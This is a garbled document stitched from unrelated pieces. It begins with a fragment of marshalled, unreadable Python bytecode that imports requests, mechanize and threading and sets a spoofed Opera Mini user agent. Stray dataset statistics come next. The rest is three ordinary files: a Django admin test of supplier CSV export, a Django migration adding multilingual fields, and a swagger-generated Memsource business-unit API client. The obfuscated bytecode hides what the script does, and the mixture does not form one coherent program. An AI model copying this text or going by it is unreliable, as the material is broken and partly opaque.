07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01t\x08\x00\x00\x00__main__(\x02\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16(*\x00\x00\x00R\x06\x00\x00\x00R\x0c\x00\x00\x00R\x08\x00\x00\x00t\x08\x00\x00\x00datetimet\x06\x00\x00\x00randomt\x07\x00\x00\x00hashlibt\x02\x00\x00\x00ret\t\x00\x00\x00threadingt\x04\x00\x00\x00jsont\x06\x00\x00\x00urllibt\t\x00\x00\x00cookielibt\x08\x00\x00\x00requestst\t\x00\x00\x00mechanizet\x14\x00\x00\x00multiprocessing.poolR\x00\x00\x00\x00t\x13\x00\x00\x00requests.exceptionsR\x01\x00\x00\x00R\x02\x00\x00\x00t\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingt\x02\x00\x00\x00brt\x11\x00\x00\x00set_handle_robotst\x05\x00\x00\x00Falset\x12\x00\x00\x00set_handle_refresht\x05\x00\x00\x00_httpt\x14\x00\x00\x00HTTPRefreshProcessort\n\x00\x00\x00addheadersR\x13\x00\x00\x00t\x01\x00\x00\x00Rt\x01\x00\x00\x00Gt\x01\x00\x00\x00Yt\x01\x00\x00\x00Bt\x01\x00\x00\x00Pt\x01\x00\x00\x00St\x01\x00\x00\x00WR\x05\x00\x00\x00R\n\x00\x00\x00R\x0b\x00\x00\x00R\x12\x00\x00\x00R\x15\x00\x00\x00R\x14\x00\x00\x00t\x08\x00\x00\x00__name__(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>t\x08\x00\x00\x00<module>\x08\x00\x00\x00s2\x00\x00\x00\x9c\x01\x10\x01\x10\x01\x10\x03\n\x01\r\x01\x0c\x01\r\x01\x1c\x01\x0c\x0b\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x02\t\x04\t\x02\t\x04\t\x06\t2\t\xe0\x0c\x01'))
| 6,015.75
| 23,985
| 0.751984
| 5,173
| 24,063
| 3.493717
| 0.098975
| 0.170641
| 0.092126
| 0.112876
| 0.679688
| 0.618658
| 0.511149
| 0.482598
| 0.465114
| 0.452222
| 0
| 0.366911
| 0.034202
| 24,063
| 4
| 23,985
| 6,015.75
| 0.410757
| 0.002452
| 0
| 0
| 0
| 2.5
| 0.298504
| 0.253677
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 9
|
90ee138e17efdd02e393b3b39634bbc43bb8ba32
| 188
|
py
|
Python
|
gcforest/cascade/__init__.py
|
MJ10/gcForest
|
88f4f16d56642bf8bea53f4f08869dc6767345b2
|
[
"MIT"
] | 1
|
2021-05-02T21:10:52.000Z
|
2021-05-02T21:10:52.000Z
|
gcforest/cascade/__init__.py
|
MJ10/gcForest
|
88f4f16d56642bf8bea53f4f08869dc6767345b2
|
[
"MIT"
] | null | null | null |
gcforest/cascade/__init__.py
|
MJ10/gcForest
|
88f4f16d56642bf8bea53f4f08869dc6767345b2
|
[
"MIT"
] | null | null | null |
from .cascade_classifier import CascadeClassifier
from .cascade_classifier import get_opt_layer_id
from .cascade_classifier import check_dir
from .cascade_classifier import calc_accuracy
| 31.333333
| 49
| 0.888298
| 25
| 188
| 6.32
| 0.52
| 0.278481
| 0.531646
| 0.683544
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090426
| 188
| 5
| 50
| 37.6
| 0.923977
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
90ff99b3d0007721217f13be383abf740741489d
| 19,310
|
py
|
Python
|
supplier/tests/test_admin.py
|
konradko/directory-api
|
e9cd05b1deaf575e94352c46ddbd1857d8119fda
|
[
"MIT"
] | 1
|
2021-11-06T12:08:26.000Z
|
2021-11-06T12:08:26.000Z
|
supplier/tests/test_admin.py
|
konradko/directory-api
|
e9cd05b1deaf575e94352c46ddbd1857d8119fda
|
[
"MIT"
] | null | null | null |
supplier/tests/test_admin.py
|
konradko/directory-api
|
e9cd05b1deaf575e94352c46ddbd1857d8119fda
|
[
"MIT"
] | null | null | null |
from collections import OrderedDict
from unittest import TestCase
from unittest.mock import patch
from django.test import Client
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
import pytest
from freezegun import freeze_time
from supplier.models import Supplier
from supplier.tests import VALID_REQUEST_DATA as SUPPLIER_DATA
from company.models import Company, CompanyCaseStudy
from company.tests import VALID_REQUEST_DATA
COMPANY_DATA = VALID_REQUEST_DATA.copy()
@pytest.mark.django_db
class DownloadCSVTestCase(TestCase):
def setUp(self):
superuser = User.objects.create_superuser(
username='admin', email='admin@example.com', password='test'
)
self.client = Client()
self.client.force_login(superuser)
self.freezer = freeze_time("2012-01-14 12:00:00")
self.freezer.start()
def tearDown(self):
self.freezer.stop()
def test_download_csv(self):
company = Company.objects.create(
**COMPANY_DATA,
sectors=['TEST', 'FOO']
)
supplier = Supplier.objects.create(company=company, **SUPPLIER_DATA)
data = {
'action': 'download_csv',
'_selected_action': Supplier.objects.all().values_list(
'pk', flat=True
)
}
response = self.client.post(
reverse('admin:supplier_supplier_changelist'),
data,
follow=True
)
expected_data = OrderedDict([
('company__address_line_1', 'test_address_line_1'),
('company__address_line_2', 'test_address_line_2'),
('company__companies_house_company_status', ''),
('company__country', 'test_country'),
('company__created', '2012-01-14 12:00:00+00:00'),
('company__date_identity_check_message_sent', ''),
('company__date_of_creation', '2010-10-10'),
('company__date_published', ''),
('company__date_registration_letter_sent', ''),
('company__date_verification_letter_sent', ''),
('company__description', 'Company description'),
('company__email_address', ''),
('company__email_full_name', ''),
('company__employees', ''),
('company__expertise_countries', "['GB']"),
('company__expertise_industries', "['INS']"),
('company__expertise_languages', "['ENG']"),
('company__expertise_products_services', '{}'),
('company__expertise_regions', "['UKG3']"),
('company__export_destinations', "['DE']"),
('company__export_destinations_other', 'LY'),
('company__facebook_url', ''),
('company__has_case_study', 'False'),
('company__has_exported_before', 'True'),
('company__id', str(supplier.company.pk)),
('company__is_exporting_goods', 'False'),
('company__is_exporting_services', 'False'),
('company__is_identity_check_message_sent', 'False'),
('company__is_published_find_a_supplier', 'False'),
('company__is_published_investment_support_directory', 'False'),
('company__is_registration_letter_sent', 'False'),
('company__is_showcase_company', 'False'),
('company__is_uk_isd_company', 'False'),
('company__is_verification_letter_sent', 'False'),
('company__keywords', ''),
('company__linkedin_url', ''),
('company__locality', 'test_locality'),
('company__logo', ''),
('company__mobile_number', '07505605132'),
('company__modified', '2012-01-14 12:00:00+00:00'),
('company__name', 'Test Company'),
('company__number', '11234567'),
('company__number_of_case_studies', '0'),
('company__number_of_sectors', '2'),
('company__po_box', ''),
('company__postal_code', 'test_postal_code'),
('company__postal_full_name', 'test_full_name'),
('company__sectors', '"TEST,FOO"'),
('company__slug', 'test-company'),
('company__summary', ''),
('company__twitter_url', ''),
('company__verified_with_code', 'False'),
('company__verified_with_companies_house_oauth2', 'False'),
('company__verified_with_identity_check', 'False'),
('company__verified_with_preverified_enrolment', 'False'),
('company__website', 'http://example.com'),
('company_email', 'gargoyle@example.com'),
('date_joined', '2017-03-21 13:12:00+00:00'),
('is_active', 'True'),
('mobile_number', ''),
('name', ''),
('role', 'EDITOR'),
('sso_id', '1'),
('unsubscribed', 'False'),
])
actual = str(response.content, 'utf-8').split('\r\n')
assert actual[0] == ','.join(expected_data.keys())
assert actual[1] == ','.join(expected_data.values())
def test_download_csv_company__sectors_is_empty(self):
company = Company.objects.create(
**COMPANY_DATA,
sectors=[]
)
supplier = Supplier.objects.create(company=company, **SUPPLIER_DATA)
data = {
'action': 'download_csv',
'_selected_action': Supplier.objects.all().values_list(
'pk', flat=True
)
}
response = self.client.post(
reverse('admin:supplier_supplier_changelist'),
data,
follow=True
)
expected_data = OrderedDict([
('company__address_line_1', 'test_address_line_1'),
('company__address_line_2', 'test_address_line_2'),
('company__companies_house_company_status', ''),
('company__country', 'test_country'),
('company__created', '2012-01-14 12:00:00+00:00'),
('company__date_identity_check_message_sent', ''),
('company__date_of_creation', '2010-10-10'),
('company__date_published', ''),
('company__date_registration_letter_sent', ''),
('company__date_verification_letter_sent', ''),
('company__description', 'Company description'),
('company__email_address', ''),
('company__email_full_name', ''),
('company__employees', ''),
('company__expertise_countries', "['GB']"),
('company__expertise_industries', "['INS']"),
('company__expertise_languages', "['ENG']"),
('company__expertise_products_services', '{}'),
('company__expertise_regions', "['UKG3']"),
('company__export_destinations', "['DE']"),
('company__export_destinations_other', 'LY'),
('company__facebook_url', ''),
('company__has_case_study', 'False'),
('company__has_exported_before', 'True'),
('company__id', str(supplier.company.pk)),
('company__is_exporting_goods', 'False'),
('company__is_exporting_services', 'False'),
('company__is_identity_check_message_sent', 'False'),
('company__is_published_find_a_supplier', 'False'),
('company__is_published_investment_support_directory', 'False'),
('company__is_registration_letter_sent', 'False'),
('company__is_showcase_company', 'False'),
('company__is_uk_isd_company', 'False'),
('company__is_verification_letter_sent', 'False'),
('company__keywords', ''),
('company__linkedin_url', ''),
('company__locality', 'test_locality'),
('company__logo', ''),
('company__mobile_number', '07505605132'),
('company__modified', '2012-01-14 12:00:00+00:00'),
('company__name', 'Test Company'),
('company__number', '11234567'),
('company__number_of_case_studies', '0'),
('company__number_of_sectors', '0'),
('company__po_box', ''),
('company__postal_code', 'test_postal_code'),
('company__postal_full_name', 'test_full_name'),
('company__sectors', ''),
('company__slug', 'test-company'),
('company__summary', ''),
('company__twitter_url', ''),
('company__verified_with_code', 'False'),
('company__verified_with_companies_house_oauth2', 'False'),
('company__verified_with_identity_check', 'False'),
('company__verified_with_preverified_enrolment', 'False'),
('company__website', 'http://example.com'),
('company_email', 'gargoyle@example.com'),
('date_joined', '2017-03-21 13:12:00+00:00'),
('is_active', 'True'),
('mobile_number', ''),
('name', ''),
('role', 'EDITOR'),
('sso_id', '1'),
('unsubscribed', 'False'),
])
actual = str(response.content, 'utf-8').split('\r\n')
assert actual[0].split(',') == list(expected_data.keys())
assert actual[1].split(',') == list(expected_data.values())
def test_download_csv_multiple_suppliers(self):
company_data2 = COMPANY_DATA.copy()
company_data2['number'] = '01234568'
supplier_data2 = SUPPLIER_DATA.copy()
supplier_data2.update({
'sso_id': 2,
'company_email': '2@example.com',
})
company1 = Company.objects.create(**COMPANY_DATA)
company2 = Company.objects.create(**company_data2)
CompanyCaseStudy.objects.create(
title='foo',
description='bar',
company=company1
)
Supplier.objects.create(company=company1, **SUPPLIER_DATA)
Supplier.objects.create(company=company2, **supplier_data2)
supplier_one_expected = OrderedDict([
('company__address_line_1', 'test_address_line_1'),
('company__address_line_2', 'test_address_line_2'),
('company__companies_house_company_status', ''),
('company__country', 'test_country'),
('company__created', '2012-01-14 12:00:00+00:00'),
('company__date_identity_check_message_sent', ''),
('company__date_of_creation', '2010-10-10'),
('company__date_published', ''),
('company__date_registration_letter_sent', ''),
('company__date_verification_letter_sent', ''),
('company__description', 'Company description'),
('company__email_address', ''),
('company__email_full_name', ''),
('company__employees', ''),
('company__expertise_countries', "['GB']"),
('company__expertise_industries', "['INS']"),
('company__expertise_languages', "['ENG']"),
('company__expertise_products_services', '{}'),
('company__expertise_regions', "['UKG3']"),
('company__export_destinations', "['DE']"),
('company__export_destinations_other', 'LY'),
('company__facebook_url', ''),
('company__has_case_study', 'True'),
('company__has_exported_before', 'True'),
('company__id', str(company1.pk)),
('company__is_exporting_goods', 'False'),
('company__is_exporting_services', 'False'),
('company__is_identity_check_message_sent', 'False'),
('company__is_published_find_a_supplier', 'False'),
('company__is_published_investment_support_directory', 'False'),
('company__is_registration_letter_sent', 'False'),
('company__is_showcase_company', 'False'),
('company__is_uk_isd_company', 'False'),
('company__is_verification_letter_sent', 'False'),
('company__keywords', ''),
('company__linkedin_url', ''),
('company__locality', 'test_locality'),
('company__logo', ''),
('company__mobile_number', '07505605132'),
('company__modified', '2012-01-14 12:00:00+00:00'),
('company__name', 'Test Company'),
('company__number', '11234567'),
('company__number_of_case_studies', '1'),
('company__number_of_sectors', '0'),
('company__po_box', ''),
('company__postal_code', 'test_postal_code'),
('company__postal_full_name', 'test_full_name'),
('company__sectors', ''),
('company__slug', 'test-company'),
('company__summary', ''),
('company__twitter_url', ''),
('company__verified_with_code', 'False'),
('company__verified_with_companies_house_oauth2', 'False'),
('company__verified_with_identity_check', 'False'),
('company__verified_with_preverified_enrolment', 'False'),
('company__website', 'http://example.com'),
('company_email', 'gargoyle@example.com'),
('date_joined', '2017-03-21 13:12:00+00:00'),
('is_active', 'True'),
('mobile_number', ''),
('name', ''),
('role', 'EDITOR'),
('sso_id', '1'),
('unsubscribed', 'False'),
])
supplier_two_expected = OrderedDict([
('company__address_line_1', 'test_address_line_1'),
('company__address_line_2', 'test_address_line_2'),
('company__companies_house_company_status', ''),
('company__country', 'test_country'),
('company__created', '2012-01-14 12:00:00+00:00'),
('company__date_identity_check_message_sent', ''),
('company__date_of_creation', '2010-10-10'),
('company__date_published', ''),
('company__date_registration_letter_sent', ''),
('company__date_verification_letter_sent', ''),
('company__description', 'Company description'),
('company__email_address', ''),
('company__email_full_name', ''),
('company__employees', ''),
('company__expertise_countries', "['GB']"),
('company__expertise_industries', "['INS']"),
('company__expertise_languages', "['ENG']"),
('company__expertise_products_services', '{}'),
('company__expertise_regions', "['UKG3']"),
('company__export_destinations', "['DE']"),
('company__export_destinations_other', 'LY'),
('company__facebook_url', ''),
('company__has_case_study', 'False'),
('company__has_exported_before', 'True'),
('company__id', str(company2.pk)),
('company__is_exporting_goods', 'False'),
('company__is_exporting_services', 'False'),
('company__is_identity_check_message_sent', 'False'),
('company__is_published_find_a_supplier', 'False'),
('company__is_published_investment_support_directory', 'False'),
('company__is_registration_letter_sent', 'False'),
('company__is_showcase_company', 'False'),
('company__is_uk_isd_company', 'False'),
('company__is_verification_letter_sent', 'False'),
('company__keywords', ''),
('company__linkedin_url', ''),
('company__locality', 'test_locality'),
('company__logo', ''),
('company__mobile_number', '07505605132'),
('company__modified', '2012-01-14 12:00:00+00:00'),
('company__name', 'Test Company'),
('company__number', '01234568'),
('company__number_of_case_studies', '0'),
('company__number_of_sectors', '0'),
('company__po_box', ''),
('company__postal_code', 'test_postal_code'),
('company__postal_full_name', 'test_full_name'),
('company__sectors', ''),
('company__slug', 'test-company'),
('company__summary', ''),
('company__twitter_url', ''),
('company__verified_with_code', 'False'),
('company__verified_with_companies_house_oauth2', 'False'),
('company__verified_with_identity_check', 'False'),
('company__verified_with_preverified_enrolment', 'False'),
('company__website', 'http://example.com'),
('company_email', '2@example.com'),
('date_joined', '2017-03-21 13:12:00+00:00'),
('is_active', 'True'),
('mobile_number', ''),
('name', ''),
('role', 'EDITOR'),
('sso_id', '2'),
('unsubscribed', 'False'),
])
data = {
'action': 'download_csv',
'_selected_action': Supplier.objects.all().values_list(
'pk', flat=True
)
}
response = self.client.post(
reverse('admin:supplier_supplier_changelist'),
data,
follow=True
)
actual = str(response.content, 'utf-8').split('\r\n')
assert actual[0].split(',') == list(supplier_one_expected.keys())
assert actual[1].split(',') == list(supplier_two_expected.values())
assert actual[2].split(',') == list(supplier_one_expected.values())
@pytest.mark.django_db
class ResendLetterTestCase(TestCase):
def setUp(self):
superuser = User.objects.create_superuser(
username='admin', email='admin@example.com', password='test'
)
self.client = Client()
self.client.force_login(superuser)
self.freezer = freeze_time("2012-01-14 12:00:00")
self.freezer.start()
def tearDown(self):
self.freezer.stop()
@patch('supplier.admin.messages')
@patch('supplier.admin.send_verification_letter')
def test_resend_letter(self, mocked_send_letter, mocked_messages):
company = Company.objects.create(**COMPANY_DATA)
supplier = Supplier.objects.create(company=company, **SUPPLIER_DATA)
# already verified supplier
other_company_data = COMPANY_DATA.copy()
other_supplier_data = SUPPLIER_DATA.copy()
other_company_data['number'] = '12345678'
other_company_data['verified_with_code'] = True
other_supplier_data['sso_id'] = 2
other_supplier_data['company_email'] = 'test@foo.com'
other_company = Company.objects.create(**other_company_data)
Supplier.objects.create(company=other_company, **other_supplier_data)
data = {
'action': 'resend_letter',
'_selected_action': Supplier.objects.all().values_list(
'pk', flat=True
)
}
response = self.client.post(
reverse('admin:supplier_supplier_changelist'),
data,
follow=True
)
assert mocked_send_letter.called_once_with(supplier.company)
assert mocked_messages.success.called_once_with(
response.request,
'Verification letter resent to 1 users'
)
assert mocked_messages.warning.called_once_with(
response.request,
'1 users skipped'
)
| 43.687783
| 77
| 0.57913
| 1,827
| 19,310
| 5.57526
| 0.11549
| 0.064795
| 0.043982
| 0.009425
| 0.855292
| 0.823483
| 0.810622
| 0.803554
| 0.784606
| 0.784606
| 0
| 0.030692
| 0.269394
| 19,310
| 441
| 78
| 43.786848
| 0.69131
| 0.001295
| 0
| 0.778325
| 0
| 0
| 0.43432
| 0.251724
| 0
| 0
| 0
| 0
| 0.024631
| 1
| 0.019704
| false
| 0.004926
| 0.029557
| 0
| 0.054187
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
46291243d73dd2ad4814c83fab948371b54b9501
| 4,248
|
py
|
Python
|
EASTAR/main/migrations/0006_auto_20191004_2355.py
|
DightMerc/EASTAR
|
04a3578932f8b4b842e0898513ef279c2f750f48
|
[
"Apache-2.0"
] | 1
|
2020-09-21T16:46:19.000Z
|
2020-09-21T16:46:19.000Z
|
EASTAR/main/migrations/0006_auto_20191004_2355.py
|
DightMerc/EASTAR
|
04a3578932f8b4b842e0898513ef279c2f750f48
|
[
"Apache-2.0"
] | null | null | null |
EASTAR/main/migrations/0006_auto_20191004_2355.py
|
DightMerc/EASTAR
|
04a3578932f8b4b842e0898513ef279c2f750f48
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 2.2.6 on 2019-10-04 18:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0005_auto_20191004_2349'),
]
operations = [
migrations.RenameField(
model_name='contenttext',
old_name='title',
new_name='titleEN',
),
migrations.RenameField(
model_name='technologies',
old_name='title',
new_name='titleEN',
),
migrations.RenameField(
model_name='technologiesmoretext',
old_name='title',
new_name='titleEN',
),
migrations.RemoveField(
model_name='contenttext',
name='text',
),
migrations.RemoveField(
model_name='technologies',
name='text',
),
migrations.RemoveField(
model_name='technologiesmoretext',
name='text',
),
migrations.AddField(
model_name='contenttext',
name='textEN',
field=models.TextField(default=None, verbose_name='Текст EN'),
preserve_default=False,
),
migrations.AddField(
model_name='contenttext',
name='textRU',
field=models.TextField(default=None, verbose_name='Текст RU'),
preserve_default=False,
),
migrations.AddField(
model_name='contenttext',
name='textUZ',
field=models.TextField(default=None, verbose_name='Текст UZ'),
preserve_default=False,
),
migrations.AddField(
model_name='contenttext',
name='titleRU',
field=models.CharField(default=None, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='contenttext',
name='titleUZ',
field=models.CharField(default=None, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='technologies',
name='textEN',
field=models.TextField(default=None, verbose_name='Описание EN'),
preserve_default=False,
),
migrations.AddField(
model_name='technologies',
name='textRU',
field=models.TextField(default=None, verbose_name='Описание RU'),
preserve_default=False,
),
migrations.AddField(
model_name='technologies',
name='textUZ',
field=models.TextField(default=None, verbose_name='Описание UZ'),
preserve_default=False,
),
migrations.AddField(
model_name='technologies',
name='titleRU',
field=models.CharField(default=None, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='technologies',
name='titleUZ',
field=models.CharField(default=None, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='technologiesmoretext',
name='textEN',
field=models.TextField(default=None, verbose_name='Текст EN'),
preserve_default=False,
),
migrations.AddField(
model_name='technologiesmoretext',
name='textRU',
field=models.TextField(default=None, verbose_name='Текст RU'),
preserve_default=False,
),
migrations.AddField(
model_name='technologiesmoretext',
name='textUZ',
field=models.TextField(default=None, verbose_name='Текст UZ'),
preserve_default=False,
),
migrations.AddField(
model_name='technologiesmoretext',
name='titleRU',
field=models.CharField(default=None, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='technologiesmoretext',
name='titleUZ',
field=models.CharField(default=None, max_length=255),
preserve_default=False,
),
]
| 32.427481
| 77
| 0.55532
| 362
| 4,248
| 6.350829
| 0.162983
| 0.08221
| 0.150065
| 0.176164
| 0.873423
| 0.873423
| 0.823836
| 0.808177
| 0.795128
| 0.606786
| 0
| 0.017394
| 0.336864
| 4,248
| 130
| 78
| 32.676923
| 0.798722
| 0.010593
| 0
| 0.919355
| 1
| 0
| 0.131635
| 0.005475
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008065
| 0
| 0.032258
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4691c3202861a42692fbaae090fd4f7fe6fcbd1d
| 20,486
|
py
|
Python
|
memsource_cli/api/business_unit_api.py
|
unofficial-memsource/memsource-cli-client
|
a6639506b74e95476da87f4375953448b76ea90c
|
[
"Apache-2.0"
] | 16
|
2019-09-25T00:20:38.000Z
|
2021-05-04T05:56:10.000Z
|
memsource_cli/api/business_unit_api.py
|
zerodayz/memsource-cli-client
|
c2574f1467539a49e6637c874e88d75c7ef789b3
|
[
"Apache-2.0"
] | 26
|
2019-09-30T14:00:03.000Z
|
2021-05-12T11:15:18.000Z
|
memsource_cli/api/business_unit_api.py
|
zerodayz/memsource-cli-client
|
c2574f1467539a49e6637c874e88d75c7ef789b3
|
[
"Apache-2.0"
] | 1
|
2021-05-24T16:19:14.000Z
|
2021-05-24T16:19:14.000Z
|
# coding: utf-8
"""
Memsource REST API
Welcome to Memsource's API documentation. To view our legacy APIs please [visit our documentation](https://wiki.memsource.com/wiki/Memsource_API) and for more information about our new APIs, [visit our blog](https://www.memsource.com/blog/2017/10/24/introducing-rest-apis-qa-with-the-memsource-api-team/). If you have any questions, please contact [Memsource Support](<mailto:support@memsource.com>). # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from memsource_cli.api_client import ApiClient
class BusinessUnitApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_business_unit(self, **kwargs): # noqa: E501
"""Create business unit # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_business_unit(async_req=True)
>>> result = thread.get()
:param async_req bool
:param BusinessUnitEditDto body:
:return: BusinessUnitDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_business_unit_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.create_business_unit_with_http_info(**kwargs) # noqa: E501
return data
def create_business_unit_with_http_info(self, **kwargs): # noqa: E501
"""Create business unit # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_business_unit_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param BusinessUnitEditDto body:
:return: BusinessUnitDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_business_unit" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/businessUnits', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BusinessUnitDto', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_business_unit(self, business_unit_id, **kwargs): # noqa: E501
"""Delete business unit # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_business_unit(business_unit_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int business_unit_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_business_unit_with_http_info(business_unit_id, **kwargs) # noqa: E501
else:
(data) = self.delete_business_unit_with_http_info(business_unit_id, **kwargs) # noqa: E501
return data
def delete_business_unit_with_http_info(self, business_unit_id, **kwargs): # noqa: E501
"""Delete business unit # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_business_unit_with_http_info(business_unit_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int business_unit_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['business_unit_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_business_unit" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'business_unit_id' is set
if ('business_unit_id' not in params or
params['business_unit_id'] is None):
raise ValueError("Missing the required parameter `business_unit_id` when calling `delete_business_unit`") # noqa: E501
collection_formats = {}
path_params = {}
if 'business_unit_id' in params:
path_params['businessUnitId'] = params['business_unit_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/businessUnits/{businessUnitId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_business_unit(self, business_unit_id, **kwargs): # noqa: E501
"""Get business unit # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_business_unit(business_unit_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int business_unit_id: (required)
:return: BusinessUnitDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_business_unit_with_http_info(business_unit_id, **kwargs) # noqa: E501
else:
(data) = self.get_business_unit_with_http_info(business_unit_id, **kwargs) # noqa: E501
return data
